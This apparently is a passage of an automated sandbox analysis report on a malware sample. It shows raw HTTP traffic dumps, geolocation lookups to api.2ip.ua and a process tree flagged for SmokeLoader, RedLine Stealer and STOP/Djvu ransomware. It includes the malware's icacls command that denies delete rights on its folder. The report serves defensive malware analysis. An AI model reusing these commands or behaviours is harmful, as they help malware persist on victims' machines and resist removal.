                                                                                                  2023-06-21 18:24:03 UTC168INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 ca 92 68 a2 28 41 00 4b 48 26 14 4e a1 f9 70 92 e7 00 00 8a bb 03 20 dc
                                                                                                  Data Ascii: 2000vh(AKH&Np
                                                                                                  2023-06-21 18:24:03 UTC176INData Raw: 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC176INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC176INData Raw: 32 30 30 30 0d 0a 80 7e 80 81 80 7e 7f 7e 7e 81 80 80 80 81 7f 7e 81 7f 7e 7f 7e 7e 7f 7f 80 80 7e 80 81 7e 7f 7e 80 7e 7f 81 80 80 81 7f 80 7e 7f 7f 7f 7f 80 7f 7e 7e 7f 7f 7f 7f 80 7f 80 80 7f 80 7e 7e 80 7f 7e 7e 7f 7e 7e 7e 7f 81 7f 7f 7e 7e 80 81 7f 7f 7e 7f 7e 80 7f 7e 7e 7e 7f 80 80 80 80 7f 80 81 81 80 7f 80 00 00 00 00 80 80 80 7f 7f 80 80 80 81 80 7f 7f 7f 7f 81 7f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 80 7f 7f 81 7f 7e 80 81 80 80 80 80 80 7f 81 80 7f 80 7f 7e 81 81 80 7f 7f 7f 7f 80 80 7f 80 7e 7f 80 7f 7f 81 7f 7f 7f 7f 80 7e 7f 81 7f 7e 7e 80 7f 81 7f 80 7e 80 7e 7f 7f 7e 80 80 7f 80 81 7e 7f 7f 7f 80 7e 80 80 7e 7f 7e 80 80 80 80 80 81 80 80 7f 80 7f 80 7e 80 7f 7f 7f 81 7f 7e 81 80 81 7f 7e 7f 7f 7f 00 00 00 00 00
                                                                                                  Data Ascii: 2000~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                  2023-06-21 18:24:03 UTC184INData Raw: 83 82 81 84 83 88
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC184INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC184INData Raw: 32 30 30 30 0d 0a 82 81 81 83 80 83 80 80 79 86 7c 80 7c 82 81 7c 8b 80 7c 84 81 7f 84 7f 7a 84 82 89 7e 7e 81 84 82 84 82 8b 8d 7e 83 8c 84 7d 7d 7f 80 7c 86 81 7e 7f 79 81 85 79 7c 94 84 7f 83 91 7d 7f 84 7e 84 7b 7e 7e 7b 80 7a 80 7f 85 7a 84 81 84 7f 87 80 80 85 7a 7b 80 82 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 82 7e 74 82 7e 7d 85 80 83 82 79 80 7f 7d 7b 7f 85 85 81 7c 7d 7f 7e 7d 85 84 83 83 7d 80 86 7c 82 82 89 81 7c 83 85 85 7d 83 87 80 81 7b 7d 80 7c 7e 88 83 84 82 7f 80 82 81 81 7b 80 80 7f 7d 80 7b 7e 7b 83 7a 7e 83 82 83 83 7c 82 7f 91 85 7b 83 82 84 81 7e 82 7d 82 85 85 7d 7d 82 8c 7d 81 81 8b 7c 80 81 81 81 81 7c 7d 81 7e 7b 7c 7b 7e 7b 7d 7c 7f 7e 70 80 7e 82 7e 80 7e 7e 81 8b 7c 7b 83 82 81 83 84 85 7b 7b 82 82
                                                                                                  Data Ascii: 2000y||||z~~~}}|~yy|}~{~~{zzz{|~t~}y}{|}~}}||}{}|~{}{~{z~|{~}}}}||}~{|{~{}|~p~~~~|{{{
                                                                                                  2023-06-21 18:24:03 UTC192INData Raw: 80 00 7f 80 80 00
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC192INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC192INData Raw: 31 66 66 38 0d 0a 80 7f 7e 00 7f 7f 7f 00 7f 7e 7f 00 80 7e 81 00 7f 7f 7f 00 7e 80 80 00 7f 80 80 00 80 80 7f 00 80 7f 80 00 7f 80 81 00 7f 80 81 00 7f 81 7e 00 80 7e 7f 00 7f 7f 81 00 80 7f 81 00 80 80 81 00 7f 7f 7f 00 80 80 7f 00 80 7e 81 00 80 7e 81 00 80 80 7e 00 80 7f 7f 00 7f 80 7e 00 80 80 7e 00 80 80 81 00 7f 81 81 00 7f 7e 80 00 7e 7f 7f 00 7f 80 7e 00 7e 80 80 00 81 7f 81 00 80 80 7e 00 7f 80 81 00 7f 7f 80 00 81 7f 7e 00 7f 80 7f 00 80 80 80 00 80 7f 7e 00 80 7f 7e 00 7e 7f 81 00 80 80 81 00 7f 7f 80 00 7f 7f 7e 00 80 80 7f 00 80 80 7e 00 7f 7e 81 00 7e 81 7f 00 81 7e 80 00 81 7e 7f 00 7f 80 7e 00 7f 81 80 00 7f 80 80 00 81 7f 7e 00 7e 81 7f 00 7f 7e 7e 00 80 7f 81 00 80 7e 81 00 80 80 80 00 80 7f 7f 00 81 7e 80 00 7f 80 80 00 80 80 7f 00 80
                                                                                                  Data Ascii: 1ff8~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                  2023-06-21 18:24:03 UTC200INData Raw: 32 30 30 30 0d 0a
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:03 UTC200INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7f 80 7f 7f 7f 80 80 81 7f 7e 7f 80 7f 80 7f 81 80 7f 81 7f 80 7f 81 81 81 7f 80 7f 80 80 7e 7f 80 7f 7f 7f 80 80 81 80 80 80 7f 7f 81 7f 7e 7f 81 7e 80 7e 80 7f 81 80 7f 80 7f 7f 80 80 80 7f 7f 80 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 80 7e 80 80 80 7f 80 7f 7f 7f 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 7f 7e 7f 7f 81 81 81 7e 7f 81 80 7f 80 7e
                                                                                                  Data Ascii: ~~~~~~~~~~~
                                                                                                  2023-06-21 18:24:03 UTC208INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC208INData Raw: 32 30 30 30 0d 0a 81 81 7f 80 81 7e 80 7e 80 80 81 80 80 81 81 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 7e 7f 80 7f 80 7f 7f 80 7f 81 80 7e 80 7f 7f 80 7f 80 7e 7f 7e 80 7f 7f 80 81 80 7f 81 7e 7f 7f 80 81 7f 80 7f 7f 80 80 7f 80 80 7f 80 7f 81 7f 80 7e 80 81 7e 7e 80 81 81 81 81 7f 80 7e 7f 80 7f 80 7f 81 81 7f 7f 00 00 00 00 00 00 00 00 7f 80 7f 80 7e 81 7e 81 7e 81 7f 80 7f 80 80 7f 80 7f 7f 80 7f 7f 7f 80 80 7f 7f 7e 7f 7e 7e 80 80 80 80 7f 7f 80 7e 7f 80 80 81 7f 7f 7e 81 7e 81 81 7f 80 81 7e 7e 7e 7f 81 7f 80 80 7e 7f 7e 7e 80 81 81 81 7f 7f 7e 80 7f 81 7e 7f 80 7e 7e 80 81 7f 81 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 80 81 80 80 7e 81 7e 80 80 7f 80 7e 7f 7f 80 7e 80 7e 7f 81 7e 7e 80 80 81 80 7f 81
                                                                                                  Data Ascii: 2000~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                                                                                  2023-06-21 18:24:03 UTC216INData Raw: 77 6f 63 69 6e 2e
                                                                                                  Data Ascii: wocin.
                                                                                                  2023-06-21 18:24:03 UTC216INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC216INData Raw: 32 30 30 30 0d 0a 20 46 65 66 75 66 75 6b 61 7a 61 2e 20 57 75 74 61 79 65 64 61 68 61 67 61 78 65 2e 20 54 65 63 65 2e 20 46 61 62 6f 20 72 69 68 20 62 75 74 65 72 65 79 61 70 6f 72 75 6d 20 62 69 68 61 76 6f 66 6f 67 61 79 75 73 69 72 2e 20 47 69 66 69 76 61 63 75 6b 69 72 61 66 65 20 62 69 68 61 76 75 2e 20 59 75 7a 65 7a 75 62 65 66 75 6c 75 7a 20 76 6f 66 65 20 6d 6f 6c 61 79 69 67 61 6b 61 78 75 20 67 6f 74 6f 6d 75 67 65 74 00 00 00 00 00 54 69 72 65 79 6f 74 75 76 61 20 7a 6f 6a 65 66 75 73 61 70 6f 2e 20 4a 69 6a 65 74 75 6b 6f 20 63 65 6b 6f 72 65 63 6f 7a 6f 70 20 63 65 74 65 20 66 61 79 61 6b 75 66 61 76 69 79 61 77 65 20 78 61 6d 65 6b 61 77 69 68 65 2e 20 47 6f 73 6f 7a 75 73 2e 20 58 61 67 6f 70 2e 20 52 61 6e 61 63 6f 77 61 67 61 6b 75 78
                                                                                                  Data Ascii: 2000 Fefufukaza. Wutayedahagaxe. Tece. Fabo rih butereyaporum bihavofogayusir. Gifivacukirafe bihavu. Yuzezubefuluz vofe molayigakaxu gotomugetTireyotuva zojefusapo. Jijetuko cekorecozop cete fayakufaviyawe xamekawihe. Gosozus. Xagop. Ranacowagakux
                                                                                                  2023-06-21 18:24:03 UTC224INData Raw: 6d 00 62 00 69 00
                                                                                                  Data Ascii: mbi
                                                                                                  2023-06-21 18:24:03 UTC224INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:03 UTC224INData Raw: 38 31 38 0d 0a 6b 00 20 00 69 00 6e 00 63 00 2e 00 00 00 00 00 3e 00 0b 00 01 00 4c 00 65 00 67 00 61 00 6c 00 54 00 72 00 61 00 64 00 65 00 6d 00 61 00 72 00 6b 00 73 00 32 00 00 00 6f 00 62 00 73 00 65 00 72 00 76 00 61 00 62 00 6c 00 65 00 00 00 00 00 3a 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 42 00 72 00 6f 00 61 00 64 00 77 00 61 00 79 00 54 00 72 00 69 00 70 00 00 00 00 00 3a 00 0b 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 36 00 2e 00 38 00 35 00 2e 00 39 00 31 00 2e 00 37 00 34 00 00 00 00 00 44 00 00 00 01 00 56 00 61 00 72 00 46 00 69 00 6c 00 65 00 49 00 6e 00 66 00 6f 00 00 00 00 00 24 00 04 00 00 00 54 00 72 00 61 00 6e 00 73 00 6c 00
                                                                                                  Data Ascii: 818k inc.>LegalTrademarks2observable:ProductNameBroadwayTrip:ProductVersion6.85.91.74DVarFileInfo$Transl


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  8192.168.2.449714162.0.217.254443C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:24:04 UTC226OUTGET /geo.json HTTP/1.1
                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                  Host: api.2ip.ua
                                                                                                  2023-06-21 18:24:04 UTC226INHTTP/1.1 429 Too Many Requests
                                                                                                  Date: Wed, 21 Jun 2023 18:24:04 GMT
                                                                                                  Server: Apache
                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade, close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  2023-06-21 18:24:04 UTC227INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  9192.168.2.449723162.0.217.254443C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-21 18:24:13 UTC227OUTGET /geo.json HTTP/1.1
                                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                                  Host: api.2ip.ua
                                                                                                  2023-06-21 18:24:13 UTC228INHTTP/1.1 429 Too Many Requests
                                                                                                  Date: Wed, 21 Jun 2023 18:24:13 GMT
                                                                                                  Server: Apache
                                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade, close
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  2023-06-21 18:24:13 UTC228INData Raw: 32 32 61 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 6c 61 73 73 65 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 22 3e 0a 09 09 09 09 4c 69 6d 69 74 20 6f 66 20 72 65 74 75 72 6e 65 64 20 6f 62 6a 65 63 74 73 20 68 61 73 20 62 65 65 6e 20 72 65 61 63 68 65 64 2e 20 46 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 62 79 20 65 6d 61 69 6c 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 68 65 6c 70 40 32 69 70 2e 6d 65 3f 73 75 62 6a 65 63 74 3d 32 69 70 2e 6d 65 22 3e 68 65 6c 70 40 32 69 70 2e 6d 65 3c 2f 61 3e 2e 20 3c 62 72 3e 3c 62 72 3e 20 d0
                                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:20:22:56
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\Desktop\file.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:223232 bytes
                                                                                                  MD5 hash:31FFF2EAFADAE81A6AE1E8580966BABA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.569549766.0000000001B62000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.569951973.00000000038E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.569951973.00000000038E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.569855669.0000000001E00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.569855669.0000000001E00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.569716746.0000000001DB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:3
                                                                                                  Start time:20:23:02
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                  Imagebase:0x7ff618f60000
                                                                                                  File size:3933184 bytes
                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:4
                                                                                                  Start time:20:23:36
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Roaming\uwjrhss
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Roaming\uwjrhss
                                                                                                  Imagebase:0x400000
                                                                                                  File size:223232 bytes
                                                                                                  MD5 hash:31FFF2EAFADAE81A6AE1E8580966BABA
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.631890597.0000000001CB0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.631913891.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.631913891.0000000001CC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.632080495.0000000001E61000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.632649984.00000000039F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.632649984.00000000039F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 35%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Target ID:5
                                                                                                  Start time:20:23:41
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:742400 bytes
                                                                                                  MD5 hash:122E0DC413CD47850CB2C9547351D03C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.630815877.000000000388A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.631154898.0000000003920000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  Reputation:low

                                                                                                  Target ID:6
                                                                                                  Start time:20:23:42
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\9721.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:742400 bytes
                                                                                                  MD5 hash:122E0DC413CD47850CB2C9547351D03C
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.651464956.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:7
                                                                                                  Start time:20:23:43
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\124D.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\124D.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:743936 bytes
                                                                                                  MD5 hash:4572249F67834C8222082D82DA18A797
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.636517473.0000000001BCB000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000007.00000002.637838144.00000000038C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 38%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Target ID:8
                                                                                                  Start time:20:23:44
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\124D.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\124D.exe
                                                                                                  Imagebase:0x1d0000
                                                                                                  File size:743936 bytes
                                                                                                  MD5 hash:4572249F67834C8222082D82DA18A797
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.640916155.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:9
                                                                                                  Start time:20:23:45
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\46F.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\46F.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:743936 bytes
                                                                                                  MD5 hash:4572249F67834C8222082D82DA18A797
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000009.00000002.648394809.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.648114882.0000000001D22000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 38%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  Target ID:10
                                                                                                  Start time:20:23:45
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:icacls "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                  Imagebase:0x1190000
                                                                                                  File size:29696 bytes
                                                                                                  MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:11
                                                                                                  Start time:20:23:47
                                                                                                  Start date:21/06/2023
                                                                                                  Path:C:\Users\user\AppData\Local\Temp\F42F.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\F42F.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:743936 bytes
